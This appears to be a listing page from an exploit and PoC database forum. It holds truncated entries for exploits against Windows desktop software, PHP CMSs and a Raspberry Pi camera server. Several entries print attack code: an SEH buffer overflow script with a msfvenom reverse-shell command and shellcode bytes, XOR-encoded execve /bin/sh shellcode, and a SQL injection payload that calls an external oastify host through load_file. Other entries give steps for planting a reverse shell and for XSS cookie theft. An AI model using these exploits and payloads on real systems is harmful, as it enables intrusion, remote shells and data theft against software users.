
?day POC Vulnerability Database

POC vulnerability database containing all CVEs, POCs and ?days from across the web in recent years; it can be connected to the ishack vulnerability scanner via API. Some vulnerabilities are visible to members only.

  1. # Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path # Google Dork: N/A # Date: 2019-11-09 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage: https://gcafe.vn/ # Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0 # Version: v3.0 # Tested on: Windows 7, Win 10, WinXP # CVE : N/A # Description: # GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points # PoC: # wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto #C:\>sc qc gbClientServ…

    • 0 replies
    • 10 views
  2. (Authenticated) ManageEngine ServiceDesk Plus MSP - CVE-2022-47966: Unauthenticated remote code execution Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 01/18/2023 Created 01/25/2023 Added 01/24/2023 Modified 06/06/2023 Description Unauthenticated remote code execution vulnerability in various ManageEngine products due to the usage of an outdated third party dependency, Apache Santuario. Solution(s) auth-manageengine-sdp-msp-cve-2022-47966 References https://attackerkb.com/topics/cve-2022-47966 CVE - 2022-47966 https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html https://www.rapid7.com/blog/p…

    • 0 replies
    • 7 views
  3. # Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] # Shellcode Author: Alexys (0x177git) # Tested on: Linux (x86_64) # Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh)) # Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram # Original code: [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm) ---- Assembly code ---- section .text global _start _start: xor eax, eax xor edx, edx ; clear rdx (ar…

    • 0 replies
    • 17 views
  4. # Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery # Exploit Author: Abhishek Joshi # Date: March 25, 2021 # Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download # Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip # Version: 0.1 # Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 # Tested against: Firefox 78.7.0esr (64-bit) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on…

    • 0 replies
    • 9 views
  5. # Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass # Date: 2022-07-25 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/patrickfuller # Software Link: https://github.com/patrickfuller/camp # Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1 # Tested on: Ubuntu 20.04 # CVE : CVE-2022-37109 "camp" Raspberry Pi camera server Authentication Bypass vulnerability https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904 1. Start an instance of the "camp" server: python3 server.py --require-login 2. Fetch the SHA-512 password hash using one of these methods: curl ht…

    • 0 replies
    • 9 views
  6. # Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR) # Exploit Author: Bobby Cooke # Date: 2020-07-07 # Vendor Site: https://www.10-strike.com/ # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe # Tested On: Windows 10 - Pro 1909 (x86) # Version: version 3.9 # Exploit Details: # 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection. # 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time. # - StackPivot…

    • 0 replies
    • 11 views
  7. # Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Step to discover Unquoted Service Path: C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto # Service info: C:\…

    • 0 replies
    • 5 views
  8. # Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH) # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open the Application # 4.- Go to 'Main' or 'Computers' # 5.- Click upon 'Add' # 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card" # 7.- Click "OK" # 8.- Profit # Blog wh…

    • 0 replies
    • 13 views
  9. # Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH) # Date: 2020-09-02 # Exploit Author: Sectechs # Vendor Homepage: https://www.10-strike.com # Version: 8.65 # Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A"* 209 # jmp short 8 # kali@root:msf-nasm_shell # nasm> jmp short 8 Next_SE_Pointer = "\xeb\x06\x90\x90" # 61e8497a SE_Handler="\x7a\x49\xe8\x61" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed payload = ( "\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "…

    • 0 replies
    • 7 views
  10. # Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) # Date: 2020-03-30 # Exploit Author: Hodorsec # Version: 9.03 # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Vendor Homepage: https://www.10-strike.com # Tested on: Win8.1 x64 - Build 9600 # Description: # - Exploits the functionality to load a list of computers from a file # - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP # - Used a jump after ROP to go to a buffer for more space # Reproduction: # - Run the script, a TXT file will be generated # - Ope…

    • 0 replies
    • 8 views
  11. # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) # Date: 2020-12-22 # Exploit Author: Florian Gassner # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.05 # Tested on: Windows 10 x64 # Computer -> From Text File -> Choose exploit.txt import struct """ Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214 """ OFFSET = 214 """ badchars = '\x00\x09\x0a\x0d\x3a\x5c' """ """ Log data, item 23 Address=01015AF4 Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [Network…

    • 0 replies
    • 6 views
  12. # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 04-11-2021 # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Tested Version: 9.31 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files (x86)\10-Strike Networ…

    • 0 replies
    • 10 views
  13. # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH) # Date: 2021-10-31 # Exploit Author: ro0k # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.31 # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 # Proof of Concept: # 1.Run python2 exploit.py to generate overflow.txt # 2.Transfer overflow.txt to the Windows 10 machine # 3.Setup Netcat listener on attacker machine # 4.Open 10-Strike Network Inventory Explorer Pro # 5.Select Computers tab from the uppermost set of tabs # 6.Select From Text File option # 7.Open overflow.…

    • 0 replies
    • 12 views
  14. Posted by ISHACK AI BOT

    ## Title: 101 News-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/16/2023 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The searchtitle parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' was submitted in the searchtitle parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The applicatio…

    • 0 replies
    • 13 views
  15. # Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH) # Date: 2020-04-01 # Exploit Author: Hodorsec # Version: v9.32 x86 # Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe # Vendor Homepage: https://www.freecommander.com # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be …

    • 0 replies
    • 5 views
  16. ****************************************************************** * 1CRM On-Premise Software 8.5.7 * * Stored XSS * ****************************************************************** //////////////////////////////////////////////////////////////////////////////////// # Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting # Date: 19/07/2019 # Exploit Author: Kusol Watchara-Apanukorn # Vendor Homepage: https://1crm.com/ # Version: 8.5.7 <= # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-14221 ////////////////////////////////////////////////////////////////////////…

    • 0 replies
    • 9 views
  17. 3CX: CVE-2023-29059: Desktop app backdoor Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/29/2023 Created 03/30/2023 Added 03/30/2023 Modified 04/12/2023 Description The 3CX desktop client available for Windows and Mac has been trojanised and is currently providing a backdoor in a suspected state-sponsored threat campaign. This check is flagging on the detection of the desktop app before 18.12.425 due to 3CX advising to avoid using the Electron App at all unless there is absolutely no alternative. Solution(s) 3cx-desktop-app-backdoor References https://attackerkb.com/topics/cve-2023-29059 CVE - 2023-29…

    • 0 replies
    • 6 views
  18. # Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.8 # Tested on: Linux Source Analysis: Line #658 - User action defined if ($action == "findimages") { Line #661 - Vulnerable condition $condition = "1=1"; Line #654 - Default limit 50 show_input_row($lang['results_per_page'], "limitnumber", 50); Line #736 - Define limit start $limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : ""; if ($limitstart == "") { $limitstart = 0; Line #743 - Define limit number $limitnumber = trim($HTTP_…

    • 0 replies
    • 7 views
  19. # Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 # Version: 4Images Gallery 1.8 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27308 -Description: A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. -Steps to reproduce: 1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) 2- Enter the credentials , Turn on the intercept and c…

    • 0 replies
    • 11 views
  20. # Exploit Title: 4images 1.9 - Remote Command Execution (RCE) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d= efault_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=3D1" // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 1…

    • 0 replies
    • 10 views
  21. # Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting # Date: 30-12-2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/download-4images # Version: 1.7.11 # Tested on: Windows 10/Kali Linux Vulnerable Parameters: Profile Image. Attack Vector: This vulnerability allows an attacker to inject the XSS payload into the IMAGE URL; each time any user goes to that URL, the XSS triggers, and the attacker is able to steal the cookie according to the crafted payload. Steps-To-Reproduce: 1. Login into 4images admin panel. 2. Now go to the add images tab. 3. Now paste the belo…

    • 0 replies
    • 5 views
  22. # Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability # Google Dork: N/A # Date: 2020-02-10 # Exploit Author: Unkn0wn # Vendor Homepage: http://davidvg.com/ # Software Link: https://www.opensourcecms.com/60cyclecms # Version: 2.5.2 # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- SQL Injection vulnerability: ---------------------------- in file /common/lib.php Line 64 -73 * function getCommentsLine($title) { $title = addslashes($title); $query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'"; // query MySQL server $result=mysql_query($query) or die("MySQL Query fail: $query"); $numComments = mysql_num_row…

    • 0 replies
    • 10 views
  23. # Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 12.09.2023 # Vendor Homepage: http://www.7stickynotes.com # Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe # Tested Version: 1.9 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the program. # Click on "New Note". # Navigate to the "Alarms" tab. # Click on either of the two buttons. # From the "For" field, select "1" and "seconds" (to obtain the shell within 1 second). # From the "Action" dropdown, select "command". # In the activated box, enter the reverse shell command and click the "Set" …

    • 0 replies
    • 16 views
  24. 7-Zip: CVE-2023-31102: 7Z File Parsing Integer Underflow Remote Code Execution Vulnerability Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 08/23/2023 Created 09/15/2023 Added 09/15/2023 Modified 07/26/2024 Description Deprecated Solution(s)

    • 0 replies
    • 5 views
  25. Posted by ISHACK AI BOT

    7-Zip: CVE-2023-31102: CWE-191 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 11/03/2023 Created 07/27/2024 Added 07/26/2024 Modified 12/19/2024 Description Ppmd7.c in 7-Zip before 23.00 allows an integer underflow and invalid read operation via a crafted 7Z archive. Solution(s) 7-zip-7-zip-upgrade-latest References https://attackerkb.com/topics/cve-2023-31102 CVE - 2023-31102 https://www.7-zip.org/download.html https://www.zerodayinitiative.com/advisories/ZDI-23-1165/ https://sourceforge.net/p/sevenzip/discussion/45797/thread/713c8a8269/ https://security.netapp.com/advisory/ntap-20231110-0007/ https://ds-security.…

    • 0 replies
    • 9 views